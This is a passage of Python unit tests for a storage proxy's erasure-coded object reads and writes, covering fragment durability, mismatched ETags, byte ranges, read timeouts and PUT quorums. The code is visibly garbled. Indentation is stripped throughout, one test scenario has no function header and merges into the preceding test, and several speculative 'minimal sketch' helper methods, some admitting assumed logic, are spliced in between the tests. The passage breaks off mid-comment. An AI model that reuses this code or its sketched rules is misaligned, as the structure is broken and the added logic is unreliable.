{'obj': obj2, 'frag': 10, 'durable': False},
{'obj': obj2, 'frag': 11, 'durable': False},
{'obj': obj2, 'frag': 12, 'durable': False},
{'obj': obj2, 'frag': 13, 'durable': False},
# handoffs
{'obj': obj1, 'frag': 0, 'durable': False},
{'obj': obj1, 'frag': 1, 'durable': False},
{'obj': obj1, 'frag': 2, 'durable': False},
{'obj': obj1, 'frag': 3, 'durable': False},
{'obj': obj1, 'frag': 4, 'durable': False},
{'obj': obj1, 'frag': 5, 'durable': False},
{'obj': obj1, 'frag': 6, 'durable': False},
{'obj': obj1, 'frag': 7, 'durable': False},
{'obj': obj1, 'frag': 8, 'durable': False},
{'obj': obj1, 'frag': 9, 'durable': False},
{'obj': obj1, 'frag': 10, 'durable': False}, # parity
{'obj': obj1, 'frag': 11, 'durable': False}, # parity
{'obj': obj1, 'frag': 12, 'durable': False}, # parity
{'obj': obj1, 'frag': 13, 'durable': True}, # parity
]
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj1['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj1['etag'])
def test_GET_with_missing_durables_and_older_durables(self):
# scenario: non-durable frags of newer obj1 obscure all durable frags
# of older obj2, so first 14 requests result in a non-durable set.
# At that point (or before) the proxy knows that a durable set of
# frags for obj2 exists so will fetch them, requiring another 10
# directed requests.
obj2 = self._make_ec_object_stub(pattern='obj2',
timestamp=self._ts_iter.next())
obj1 = self._make_ec_object_stub(pattern='obj1',
timestamp=self._ts_iter.next())
node_frags = [
[{'obj': obj1, 'frag': 0, 'durable': False}], # obj2 missing
[{'obj': obj1, 'frag': 1, 'durable': False},
{'obj': obj2, 'frag': 1, 'durable': True}],
[{'obj': obj1, 'frag': 2, 'durable': False}], # obj2 missing
[{'obj': obj1, 'frag': 3, 'durable': False},
{'obj': obj2, 'frag': 3, 'durable': True}],
[{'obj': obj1, 'frag': 4, 'durable': False},
{'obj': obj2, 'frag': 4, 'durable': True}],
[{'obj': obj1, 'frag': 5, 'durable': False},
{'obj': obj2, 'frag': 5, 'durable': True}],
[{'obj': obj1, 'frag': 6, 'durable': False},
{'obj': obj2, 'frag': 6, 'durable': True}],
[{'obj': obj1, 'frag': 7, 'durable': False},
{'obj': obj2, 'frag': 7, 'durable': True}],
[{'obj': obj1, 'frag': 8, 'durable': False},
{'obj': obj2, 'frag': 8, 'durable': True}],
[{'obj': obj1, 'frag': 9, 'durable': False}], # obj2 missing
[{'obj': obj1, 'frag': 10, 'durable': False},
{'obj': obj2, 'frag': 10, 'durable': True}],
[{'obj': obj1, 'frag': 11, 'durable': False},
{'obj': obj2, 'frag': 11, 'durable': True}],
[{'obj': obj1, 'frag': 12, 'durable': False}], # obj2 missing
[{'obj': obj1, 'frag': 13, 'durable': False},
{'obj': obj2, 'frag': 13, 'durable': True}],
]
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj2['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj2['etag'])
# max: proxy will GET all non-durable obj1 frags and then 10 obj2 frags
self.assertLessEqual(len(log), self.replicas() + self.policy.ec_ndata)
# min: proxy will GET 10 non-durable obj1 frags and then 10 obj2 frags
self.assertGreaterEqual(len(log), 2 * self.policy.ec_ndata)
# scenario: obj3 has 14 frags but only 2 are durable and these are
# obscured by two non-durable frags of obj1. There is also a single
# non-durable frag of obj2. The proxy will need to do at least 10
# GETs to see all the obj3 frags plus 1 more to GET a durable frag.
# The proxy may also do one more GET if the obj2 frag is found.
# i.e. 10 + 1 durable for obj3, 2 for obj1 and 1 more if obj2 found
obj2 = self._make_ec_object_stub(pattern='obj2',
timestamp=self._ts_iter.next())
obj3 = self._make_ec_object_stub(pattern='obj3',
timestamp=self._ts_iter.next())
obj1 = self._make_ec_object_stub(pattern='obj1',
timestamp=self._ts_iter.next())
node_frags = [
[{'obj': obj1, 'frag': 0, 'durable': False}, # obj1 frag
{'obj': obj3, 'frag': 0, 'durable': True}],
[{'obj': obj1, 'frag': 1, 'durable': False}, # obj1 frag
{'obj': obj3, 'frag': 1, 'durable': True}],
[{'obj': obj2, 'frag': 2, 'durable': False}, # obj2 frag
{'obj': obj3, 'frag': 2, 'durable': False}],
[{'obj': obj3, 'frag': 3, 'durable': False}],
[{'obj': obj3, 'frag': 4, 'durable': False}],
[{'obj': obj3, 'frag': 5, 'durable': False}],
[{'obj': obj3, 'frag': 6, 'durable': False}],
[{'obj': obj3, 'frag': 7, 'durable': False}],
[{'obj': obj3, 'frag': 8, 'durable': False}],
[{'obj': obj3, 'frag': 9, 'durable': False}],
[{'obj': obj3, 'frag': 10, 'durable': False}],
[{'obj': obj3, 'frag': 11, 'durable': False}],
[{'obj': obj3, 'frag': 12, 'durable': False}],
[{'obj': obj3, 'frag': 13, 'durable': False}],
]
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj3['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj3['etag'])
self.assertGreaterEqual(len(log), self.policy.ec_ndata + 1)
self.assertLessEqual(len(log), self.policy.ec_ndata + 4)
def test_GET_with_missing_durables_and_older_non_durables(self):
# scenario: non-durable frags of newer obj1 obscure all frags
# of older obj2, so first 28 requests result in a non-durable set.
# There are only 10 frags for obj2 and one is not durable.
obj2 = self._make_ec_object_stub(pattern='obj2',
timestamp=self._ts_iter.next())
obj1 = self._make_ec_object_stub(pattern='obj1',
timestamp=self._ts_iter.next())
node_frags = [
[{'obj': obj1, 'frag': 0, 'durable': False}], # obj2 missing
[{'obj': obj1, 'frag': 1, 'durable': False},
{'obj': obj2, 'frag': 1, 'durable': False}], # obj2 non-durable
[{'obj': obj1, 'frag': 2, 'durable': False}], # obj2 missing
[{'obj': obj1, 'frag': 3, 'durable': False},
{'obj': obj2, 'frag': 3, 'durable': True}],
[{'obj': obj1, 'frag': 4, 'durable': False},
{'obj': obj2, 'frag': 4, 'durable': True}],
[{'obj': obj1, 'frag': 5, 'durable': False},
{'obj': obj2, 'frag': 5, 'durable': True}],
[{'obj': obj1, 'frag': 6, 'durable': False},
{'obj': obj2, 'frag': 6, 'durable': True}],
[{'obj': obj1, 'frag': 7, 'durable': False},
{'obj': obj2, 'frag': 7, 'durable': True}],
[{'obj': obj1, 'frag': 8, 'durable': False},
{'obj': obj2, 'frag': 8, 'durable': True}],
[{'obj': obj1, 'frag': 9, 'durable': False}], # obj2 missing
[{'obj': obj1, 'frag': 10, 'durable': False},
{'obj': obj2, 'frag': 10, 'durable': True}],
[{'obj': obj1, 'frag': 11, 'durable': False},
{'obj': obj2, 'frag': 11, 'durable': True}],
[{'obj': obj1, 'frag': 12, 'durable': False}], # obj2 missing
[{'obj': obj1, 'frag': 13, 'durable': False},
{'obj': obj2, 'frag': 13, 'durable': True}],
[], # 1 empty primary
]
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj2['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj2['etag'])
# max: proxy will GET all non-durable obj1 frags and then 10 obj2 frags
self.assertLessEqual(len(log), self.replicas() + self.policy.ec_ndata)
# min: proxy will GET 10 non-durable obj1 frags and then 10 obj2 frags
self.assertGreaterEqual(len(log), 2 * self.policy.ec_ndata)
def test_GET_with_mixed_etags_at_same_timestamp(self):
# this scenario should never occur but if there are somehow
# fragments for different content at the same timestamp then the
# object controller should handle it gracefully
ts = self.ts() # force equal timestamps for two objects
obj1 = self._make_ec_object_stub(timestamp=ts, pattern='obj1')
obj2 = self._make_ec_object_stub(timestamp=ts, pattern='obj2')
self.assertNotEqual(obj1['etag'], obj2['etag']) # sanity
node_frags = [
# 7 frags of obj2 are available and durable
{'obj': obj2, 'frag': 0, 'durable': True},
{'obj': obj2, 'frag': 1, 'durable': True},
{'obj': obj2, 'frag': 2, 'durable': True},
{'obj': obj2, 'frag': 3, 'durable': True},
{'obj': obj2, 'frag': 4, 'durable': True},
{'obj': obj2, 'frag': 5, 'durable': True},
{'obj': obj2, 'frag': 6, 'durable': True},
# 7 frags of obj1 are available and durable
{'obj': obj1, 'frag': 7, 'durable': True},
{'obj': obj1, 'frag': 8, 'durable': True},
{'obj': obj1, 'frag': 9, 'durable': True},
{'obj': obj1, 'frag': 10, 'durable': True},
{'obj': obj1, 'frag': 11, 'durable': True},
{'obj': obj1, 'frag': 12, 'durable': True},
{'obj': obj1, 'frag': 13, 'durable': True},
] + [[]] * self.replicas() # handoffs
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
# read body to provoke any EC decode errors
self.assertFalse(resp.body)
self.assertEqual(resp.status_int, 404)
self.assertEqual(len(log), self.replicas() * 2)
collected_etags = set()
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
collected_etags.add(etag) # will be None from handoffs
self.assertEqual({obj1['etag'], obj2['etag'], None}, collected_etags)
log_lines = self.app.logger.get_lines_for_level('error')
self.assertEqual(log_lines,
['Problem with fragment response: ETag mismatch'] * 7)
def test_GET_mixed_success_with_range(self):
fragment_size = self.policy.fragment_size
ec_stub = self._make_ec_object_stub()
frag_archives = ec_stub['frags']
frag_archive_size = len(ec_stub['frags'][0])
headers = {
'Content-Type': 'text/plain',
'Content-Length': fragment_size,
'Content-Range': 'bytes 0-%s/%s' % (fragment_size - 1,
frag_archive_size),
'X-Object-Sysmeta-Ec-Content-Length': len(ec_stub['body']),
'X-Object-Sysmeta-Ec-Etag': ec_stub['etag'],
'X-Timestamp': Timestamp(self._ts_iter.next()).normal,
}
responses = [
StubResponse(206, frag_archives[0][:fragment_size], headers, 0),
StubResponse(206, frag_archives[1][:fragment_size], headers, 1),
StubResponse(206, frag_archives[2][:fragment_size], headers, 2),
StubResponse(206, frag_archives[3][:fragment_size], headers, 3),
StubResponse(206, frag_archives[4][:fragment_size], headers, 4),
# data nodes with old frag
StubResponse(416, frag_index=5),
StubResponse(416, frag_index=6),
StubResponse(206, frag_archives[7][:fragment_size], headers, 7),
StubResponse(206, frag_archives[8][:fragment_size], headers, 8),
StubResponse(206, frag_archives[9][:fragment_size], headers, 9),
# hopefully we ask for two more
StubResponse(206, frag_archives[10][:fragment_size], headers, 10),
StubResponse(206, frag_archives[11][:fragment_size], headers, 11),
]
def get_response(req):
return responses.pop(0) if responses else StubResponse(404)
req = swob.Request.blank('/v1/a/c/o', headers={'Range': 'bytes=0-3'})
with capture_http_requests(get_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 206)
self.assertEqual(resp.body, 'test')
self.assertEqual(len(log), self.policy.ec_ndata + 2)
# verify that even when last responses to be collected are 416's
# the shortfall of 2xx responses still triggers extra spawned requests
responses = [
StubResponse(206, frag_archives[0][:fragment_size], headers, 0),
StubResponse(206, frag_archives[1][:fragment_size], headers, 1),
StubResponse(206, frag_archives[2][:fragment_size], headers, 2),
StubResponse(206, frag_archives[3][:fragment_size], headers, 3),
StubResponse(206, frag_archives[4][:fragment_size], headers, 4),
StubResponse(206, frag_archives[7][:fragment_size], headers, 7),
StubResponse(206, frag_archives[8][:fragment_size], headers, 8),
StubResponse(206, frag_archives[9][:fragment_size], headers, 9),
StubResponse(206, frag_archives[10][:fragment_size], headers, 10),
# data nodes with old frag
StubResponse(416, frag_index=5),
# hopefully we ask for one more
StubResponse(416, frag_index=6),
# and hopefully we ask for another
StubResponse(206, frag_archives[11][:fragment_size], headers, 11),
]
req = swob.Request.blank('/v1/a/c/o', headers={'Range': 'bytes=0-3'})
with capture_http_requests(get_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 206)
self.assertEqual(resp.body, 'test')
self.assertEqual(len(log), self.policy.ec_ndata + 2)
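# A minimal sketch (a simplified assumption, ignoring pyeclib frag headers)
# of the range translation behind these tests: a client byte range is
# served from whole segments, and each segment contributes fragment_size
# bytes in every frag archive.
def _sketch_frag_range_for(self, client_start, client_end):
    seg_size = self.policy.ec_segment_size
    frag_size = self.policy.fragment_size
    first_seg = client_start // seg_size
    last_seg = client_end // seg_size
    return (first_seg * frag_size, (last_seg + 1) * frag_size - 1)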
def test_GET_with_range_unsatisfiable_mixed_success(self):
responses = [
StubResponse(416, frag_index=0),
StubResponse(416, frag_index=1),
StubResponse(416, frag_index=2),
StubResponse(416, frag_index=3),
StubResponse(416, frag_index=4),
StubResponse(416, frag_index=5),
StubResponse(416, frag_index=6),
# sneak in bogus extra responses
StubResponse(404),
StubResponse(206, frag_index=8),
# and then just "enough" more 416's
StubResponse(416, frag_index=9),
StubResponse(416, frag_index=10),
StubResponse(416, frag_index=11),
]
def get_response(req):
return responses.pop(0) if responses else StubResponse(404)
req = swob.Request.blank('/v1/a/c/o', headers={
'Range': 'bytes=%s-' % 100000000000000})
with capture_http_requests(get_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 416)
# ec_ndata responses that must agree, plus the bogus extras
self.assertEqual(len(log), self.policy.ec_ndata + 2)
def test_GET_with_missing_and_range_unsatisfiable(self):
responses = [ # not quite ec_ndata frags on primaries
StubResponse(416, frag_index=0),
StubResponse(416, frag_index=1),
StubResponse(416, frag_index=2),
StubResponse(416, frag_index=3),
StubResponse(416, frag_index=4),
StubResponse(416, frag_index=5),
StubResponse(416, frag_index=6),
StubResponse(416, frag_index=7),
StubResponse(416, frag_index=8),
]
def get_response(req):
return responses.pop(0) if responses else StubResponse(404)
req = swob.Request.blank('/v1/a/c/o', headers={
'Range': 'bytes=%s-' % 100000000000000})
with capture_http_requests(get_response) as log:
resp = req.get_response(self.app)
# TODO: does 416 make sense without a quorum, or should this be a 404?
# a non-range GET of same object would return 404
self.assertEqual(resp.status_int, 416)
self.assertEqual(len(log), 2 * self.replicas())
def test_GET_with_success_and_507_will_503(self):
responses = [ # only 9 good nodes
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
]
def get_response(req):
# bad disk on all other nodes
return responses.pop(0) if responses else StubResponse(507)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(get_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
self.assertEqual(len(log), 2 * self.replicas())
def test_GET_with_success_and_404_will_404(self):
responses = [ # only 9 good nodes
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
StubResponse(200),
]
def get_response(req):
# no frags on other nodes
return responses.pop(0) if responses else StubResponse(404)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(get_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
self.assertEqual(len(log), 2 * self.replicas())
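# A minimal sketch (a simplification, not the proxy's actual best-response
# logic) of the aggregation the two tests above exercise: short of
# ec_ndata good frags no decode is possible, and the overall status then
# follows the character of the failures: 507s read as server errors
# (503) while clean 404s read as not-found (404).
def _sketch_aggregate_status(self, good_count, filler_status):
    if good_count >= self.policy.ec_ndata:
        return 200
    return 404 if filler_status == 404 else 503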
def test_GET_mixed_ranged_responses_success(self):
segment_size = self.policy.ec_segment_size
frag_size = self.policy.fragment_size
new_data = ('test' * segment_size)[:-492]
new_etag = md5(new_data).hexdigest()
new_archives = self._make_ec_archive_bodies(new_data)
old_data = ('junk' * segment_size)[:-492]
old_etag = md5(old_data).hexdigest()
old_archives = self._make_ec_archive_bodies(old_data)
frag_archive_size = len(new_archives[0])
# here we deliberately omit X-Backend-Data-Timestamp to check that
# proxy will tolerate responses from object server that have not been
# upgraded to send that header
old_headers = {
'Content-Type': 'text/plain',
'Content-Length': frag_size,
'Content-Range': 'bytes 0-%s/%s' % (frag_size - 1,
frag_archive_size),
'X-Object-Sysmeta-Ec-Content-Length': len(old_data),
'X-Object-Sysmeta-Ec-Etag': old_etag,
'X-Backend-Timestamp': Timestamp(self._ts_iter.next()).internal
}
new_headers = {
'Content-Type': 'text/plain',
'Content-Length': frag_size,
'Content-Range': 'bytes 0-%s/%s' % (frag_size - 1,
frag_archive_size),
'X-Object-Sysmeta-Ec-Content-Length': len(new_data),
'X-Object-Sysmeta-Ec-Etag': new_etag,
'X-Backend-Timestamp': Timestamp(self._ts_iter.next()).internal
}
# 7 primaries with stale frags, 3 handoffs failed to get new frags
responses = [
StubResponse(206, old_archives[0][:frag_size], old_headers, 0),
StubResponse(206, new_archives[1][:frag_size], new_headers, 1),
StubResponse(206, old_archives[2][:frag_size], old_headers, 2),
StubResponse(206, new_archives[3][:frag_size], new_headers, 3),
StubResponse(206, old_archives[4][:frag_size], old_headers, 4),
StubResponse(206, new_archives[5][:frag_size], new_headers, 5),
StubResponse(206, old_archives[6][:frag_size], old_headers, 6),
StubResponse(206, new_archives[7][:frag_size], new_headers, 7),
StubResponse(206, old_archives[8][:frag_size], old_headers, 8),
StubResponse(206, new_archives[9][:frag_size], new_headers, 9),
StubResponse(206, old_archives[10][:frag_size], old_headers, 10),
StubResponse(206, new_archives[11][:frag_size], new_headers, 11),
StubResponse(206, old_archives[12][:frag_size], old_headers, 12),
StubResponse(206, new_archives[13][:frag_size], new_headers, 13),
StubResponse(206, new_archives[0][:frag_size], new_headers, 0),
StubResponse(404),
StubResponse(404),
StubResponse(206, new_archives[6][:frag_size], new_headers, 6),
StubResponse(404),
StubResponse(206, new_archives[10][:frag_size], new_headers, 10),
StubResponse(206, new_archives[12][:frag_size], new_headers, 12),
]
def get_response(req):
return responses.pop(0) if responses else StubResponse(404)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(get_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.body, new_data[:segment_size])
self.assertEqual(len(log), self.policy.ec_ndata + 10)
def test_GET_mismatched_fragment_archives(self):
segment_size = self.policy.ec_segment_size
test_data1 = ('test' * segment_size)[:-333]
# N.B. the object data *length* here is different
test_data2 = ('blah1' * segment_size)[:-333]
etag1 = md5(test_data1).hexdigest()
etag2 = md5(test_data2).hexdigest()
ec_archive_bodies1 = self._make_ec_archive_bodies(test_data1)
ec_archive_bodies2 = self._make_ec_archive_bodies(test_data2)
headers1 = {'X-Object-Sysmeta-Ec-Etag': etag1,
'X-Object-Sysmeta-Ec-Content-Length': '333'}
# here we're going to *lie* and say this etag matches
headers2 = {'X-Object-Sysmeta-Ec-Etag': etag1,
'X-Object-Sysmeta-Ec-Content-Length': '333'}
responses1 = [(200, body, self._add_frag_index(fi, headers1))
for fi, body in enumerate(ec_archive_bodies1)]
responses2 = [(200, body, self._add_frag_index(fi, headers2))
for fi, body in enumerate(ec_archive_bodies2)]
req = swob.Request.blank('/v1/a/c/o')
# sanity check responses1
responses = responses1[:self.policy.ec_ndata]
status_codes, body_iter, headers = zip(*responses)
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(md5(resp.body).hexdigest(), etag1)
# sanity check responses2
responses = responses2[:self.policy.ec_ndata]
status_codes, body_iter, headers = zip(*responses)
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(md5(resp.body).hexdigest(), etag2)
# now mix the responses a bit
mix_index = random.randint(0, self.policy.ec_ndata - 1)
mixed_responses = responses1[:self.policy.ec_ndata]
mixed_responses[mix_index] = responses2[mix_index]
status_codes, body_iter, headers = zip(*mixed_responses)
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
try:
resp.body
except ECDriverError:
resp._app_iter.close()
else:
self.fail('invalid ec fragment response body did not blow up!')
error_lines = self.logger.get_lines_for_level('error')
self.assertEqual(1, len(error_lines))
msg = error_lines[0]
self.assertIn('Error decoding fragments', msg)
self.assertIn('/a/c/o', msg)
log_msg_args, log_msg_kwargs = self.logger.log_dict['error'][0]
self.assertEqual(log_msg_kwargs['exc_info'][0], ECDriverError)
def test_GET_read_timeout(self):
segment_size = self.policy.ec_segment_size
test_data = ('test' * segment_size)[:-333]
etag = md5(test_data).hexdigest()
ec_archive_bodies = self._make_ec_archive_bodies(test_data)
headers = {'X-Object-Sysmeta-Ec-Etag': etag}
self.app.recoverable_node_timeout = 0.01
responses = [
(200, SlowBody(body, 0.1), self._add_frag_index(i, headers))
for i, body in enumerate(ec_archive_bodies)
] * self.policy.ec_duplication_factor
req = swob.Request.blank('/v1/a/c/o')
status_codes, body_iter, headers = zip(*responses + [
(404, '', {}) for i in range(
self.policy.object_ring.max_more_nodes)])
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
# do this inside the fake http context manager, it'll try to
# resume but won't be able to give us all the right bytes
self.assertNotEqual(md5(resp.body).hexdigest(), etag)
error_lines = self.logger.get_lines_for_level('error')
self.assertEqual(self.replicas(), len(error_lines))
nparity = self.policy.ec_nparity
for line in error_lines[:nparity]:
self.assertIn('retrying', line)
for line in error_lines[nparity:]:
self.assertIn('ChunkReadTimeout (0.01s)', line)
def test_GET_read_timeout_resume(self):
segment_size = self.policy.ec_segment_size
test_data = ('test' * segment_size)[:-333]
etag = md5(test_data).hexdigest()
ec_archive_bodies = self._make_ec_archive_bodies(test_data)
headers = {'X-Object-Sysmeta-Ec-Etag': etag}
self.app.recoverable_node_timeout = 0.05
# first one is slow
responses = [(200, SlowBody(ec_archive_bodies[0], 0.1),
self._add_frag_index(0, headers))]
# ... the rest are fine
responses += [(200, body, self._add_frag_index(i, headers))
for i, body in enumerate(ec_archive_bodies[1:], start=1)]
req = swob.Request.blank('/v1/a/c/o')
status_codes, body_iter, headers = zip(
*responses[:self.policy.ec_ndata + 1])
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(md5(resp.body).hexdigest(), etag)
error_lines = self.logger.get_lines_for_level('error')
self.assertEqual(1, len(error_lines))
self.assertIn('retrying', error_lines[0])
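# A minimal sketch (a hypothetical form, heavily simplified) of the resume
# behaviour the two timeout tests rely on: when a source times out
# mid-body, the getter remembers how many bytes it has already served and
# asks the next node only for the remainder.
def _sketch_resume_range_header(self, bytes_served, total_length):
    return 'bytes=%d-%d' % (bytes_served, total_length - 1)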
def test_fix_response_HEAD(self):
headers = {'X-Object-Sysmeta-Ec-Content-Length': '10',
'X-Object-Sysmeta-Ec-Etag': 'foo'}
# successful HEAD
responses = [(200, '', headers)]
status_codes, body_iter, headers = zip(*responses)
req = swift.common.swob.Request.blank('/v1/a/c/o', method='HEAD')
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.body, '')
# 200 OK shows the original object's content length
self.assertEqual(resp.headers['Content-Length'], '10')
self.assertEqual(resp.headers['Etag'], 'foo')
# not found HEAD
responses = [(404, '', {})] * self.replicas() * 2
status_codes, body_iter, headers = zip(*responses)
req = swift.common.swob.Request.blank('/v1/a/c/o', method='HEAD')
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
# 404 shows actual response body size (i.e. 0 for HEAD)
self.assertEqual(resp.headers['Content-Length'], '0')
def test_PUT_with_slow_commits(self):
# It's important that this timeout be much less than the delay in
# the slow commit responses so that the slow commits are not waited
# for.
self.app.post_quorum_timeout = 0.01
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
# plenty of slow commits
response_sleep = 5.0
codes = [FakeStatus(201, response_sleep=response_sleep)
for i in range(self.replicas())]
# swap out some with regular fast responses
number_of_fast_responses_needed_to_be_quick_enough = \
self.policy.quorum
fast_indexes = random.sample(
range(self.replicas()),
number_of_fast_responses_needed_to_be_quick_enough)
for i in fast_indexes:
codes[i] = 201
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
start = time.time()
resp = req.get_response(self.app)
response_time = time.time() - start
self.assertEqual(resp.status_int, 201)
self.assertLess(response_time, response_sleep)
def test_PUT_with_just_enough_durable_responses(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [201] * (self.policy.ec_ndata + 1)
codes += [503] * (self.policy.ec_nparity - 1)
self.assertEqual(len(codes), self.policy.ec_n_unique_fragments)
random.shuffle(codes)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_with_less_durable_responses(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [201] * (self.policy.ec_ndata)
codes += [503] * (self.policy.ec_nparity)
self.assertEqual(len(codes), self.policy.ec_n_unique_fragments)
random.shuffle(codes)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
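# A minimal sketch (based on the two PUT tests above; the exact quorum
# rule is an assumption) of the commit threshold: ec_ndata successes
# alone cannot guarantee the object survives the loss of one of them, so
# the proxy wants at least ec_ndata + 1 durable responses before a 201.
def _sketch_put_commit_ok(self, durable_responses):
    return durable_responses >= self.policy.ec_ndata + 1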
def test_GET_with_invalid_ranges(self):
# real body size is segment_size - 10 (just 1 segment)
segment_size = self.policy.ec_segment_size
real_body = ('a' * segment_size)[:-10]
# range is out of real body but in segment size
self._test_invalid_ranges('GET', real_body,
segment_size, '%s-' % (segment_size - 10))
# range is out of both real body and segment size
self._test_invalid_ranges('GET', real_body,
segment_size, '%s-' % (segment_size + 10))
def _test_invalid_ranges(self, method, real_body, segment_size, req_range):
# make a request with range starts from more than real size.
body_etag = md5(real_body).hexdigest()
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method=method,
headers={'Destination': 'c1/o',
'Range': 'bytes=%s' % (req_range)})
fragments = self.policy.pyeclib_driver.encode(real_body)
fragment_payloads = [fragments * self.policy.ec_duplication_factor]
node_fragments = zip(*fragment_payloads)
self.assertEqual(len(node_fragments), self.replicas()) # sanity
headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body)),
'X-Object-Sysmeta-Ec-Etag': body_etag}
start = int(req_range.split('-')[0])
self.assertGreaterEqual(start, 0) # sanity
title, exp = swob.RESPONSE_REASONS[416]
range_not_satisfiable_body = \
'<html><h1>%s</h1><p>%s</p></html>' % (title, exp)
if start >= segment_size:
responses = [(416, range_not_satisfiable_body,
self._add_frag_index(i, headers))
for i in range(POLICIES.default.ec_ndata)]
else:
responses = [(200, ''.join(node_fragments[i]),
self._add_frag_index(i, headers))
for i in range(POLICIES.default.ec_ndata)]
status_codes, body_iter, headers = zip(*responses)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 416)
self.assertEqual(resp.content_length, len(range_not_satisfiable_body))
self.assertEqual(resp.body, range_not_satisfiable_body)
self.assertEqual(resp.etag, body_etag)
self.assertEqual(resp.headers['Accept-Ranges'], 'bytes')
class TestECFunctions(unittest.TestCase):
def test_chunk_transformer(self):
def do_test(dup_factor, segments):
segment_size = 1024
orig_chunks = []
for i in range(segments):
orig_chunks.append(chr(i + 97) * segment_size)
policy = ECStoragePolicy(0, 'ec8-2', ec_type=DEFAULT_TEST_EC_TYPE,
ec_ndata=8, ec_nparity=2,
object_ring=FakeRing(
replicas=10 * dup_factor),
ec_segment_size=segment_size,
ec_duplication_factor=dup_factor)
encoded_chunks = [[] for _ in range(policy.ec_n_unique_fragments)]
for orig_chunk in orig_chunks:
# each segment produces a set of frags
frag_set = policy.pyeclib_driver.encode(orig_chunk)
for frag_index, frag_data in enumerate(frag_set):
encoded_chunks[frag_index].append(frag_data)
# chunk_transformer buffers and concatenates multiple frags
expected = [''.join(frags) for frags in encoded_chunks]
transform = obj.chunk_transformer(policy)
transform.send(None)
backend_chunks = transform.send(''.join(orig_chunks))
self.assertIsNotNone(backend_chunks) # sanity
self.assertEqual(
len(backend_chunks), policy.ec_n_unique_fragments)
self.assertEqual(expected, backend_chunks)
# flush out last chunk buffer
backend_chunks = transform.send('')
self.assertEqual(
len(backend_chunks), policy.ec_n_unique_fragments)
self.assertEqual([''] * policy.ec_n_unique_fragments,
backend_chunks)
do_test(dup_factor=1, segments=1)
do_test(dup_factor=2, segments=1)
do_test(dup_factor=3, segments=1)
do_test(dup_factor=1, segments=2)
do_test(dup_factor=2, segments=2)
do_test(dup_factor=3, segments=2)
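# A minimal sketch (hypothetical, not Swift's chunk_transformer) of the
# buffering rule the test above exercises: bytes accumulate until a full
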